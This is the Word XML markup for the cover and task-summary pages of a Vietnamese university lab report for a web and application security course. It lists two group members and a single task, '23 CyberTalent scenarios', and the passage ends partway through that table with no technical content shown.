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5582B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:color w:val="002060"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:color w:val="002060"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>BÁO CÁO BÀI TẬP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D42B43" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Môn học: Bảo mật Web và Ứng dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8C6150" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Kỳ báo cáo: Buổi 01 (Session 02)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637E07D6" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Tên chủ đề: Intro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FF8B69" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>GV: Nghi Hoàng Khoa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A941FDA" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>Ngày báo cáo: 15/03/2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F96A677" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Nhóm: 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D0CE2" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>THÔNG TIN CHUNG:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3563F213" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>(Liệt kê tất cả các thành viên trong nhóm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A90AE" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Lớp: </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="bookmark=id.30j0zll" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="1" w:name="bookmark=id.1fob9te" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="2" w:name="bookmark=id.gjdgxs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>NT213.N</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>21.ANTN</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="9793" w:type="dxa"/>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8"/>
        <w:gridCol w:w="3247"/>
        <w:gridCol w:w="2411"/>
        <w:gridCol w:w="3297"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CD6539" w:rsidRPr="007913DC" w14:paraId="407F3C6C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="702"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA"/>
          </w:tcPr>
          <w:p w14:paraId="059D36FC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="624"/>
              </w:tabs>
              <w:ind w:left="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>STT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3247" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA"/>
          </w:tcPr>
          <w:p w14:paraId="7B5317DE" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Họ và tên</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA"/>
          </w:tcPr>
          <w:p w14:paraId="3DC793F0" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>MSSV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3297" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA"/>
          </w:tcPr>
          <w:p w14:paraId="2C83346E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="1452"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD6539" w:rsidRPr="007913DC" w14:paraId="3DE82984" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="282"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C3DDA9E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3247" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BF8C202" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Võ Anh Kiệt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31377BB4" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>20520605</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3297" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38916BFA" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>20520605@gm.uit.edu.vn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD6539" w:rsidRPr="007913DC" w14:paraId="4D6CC222" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="416"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E8D82AD" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3247" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65DAD287" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Hoàng Đình Hiếu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16CB8147" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>20521317</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3297" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="182B3A6A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>20521317@gm.uit.edu.vn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60607315" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2BD992" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>NỘI DUNG THỰC HIỆN:</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:u w:val="single"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:footnoteReference w:id="1"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a4"/>
        <w:tblW w:w="990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2"/>
        <w:gridCol w:w="4280"/>
        <w:gridCol w:w="2551"/>
        <w:gridCol w:w="2392"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CD6539" w:rsidRPr="007913DC" w14:paraId="6F83AE9C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="233"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="682" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0046BA4B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>STT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4280" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3465734A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Công việc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA"/>
          </w:tcPr>
          <w:p w14:paraId="33049F86" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Kết quả tự đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA"/>
          </w:tcPr>
          <w:p w14:paraId="53689E09" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Người đóng góp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD6539" w:rsidRPr="007913DC" w14:paraId="199A9648" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="52"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="682" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29CE93BB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7506268D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>23 kịch bản CyberTalent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0801E337" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B766F59" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD6539" w:rsidRPr="007913DC" w14:paraId="7B8059E1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="52"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="682" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A83FFAD" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14F4808B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
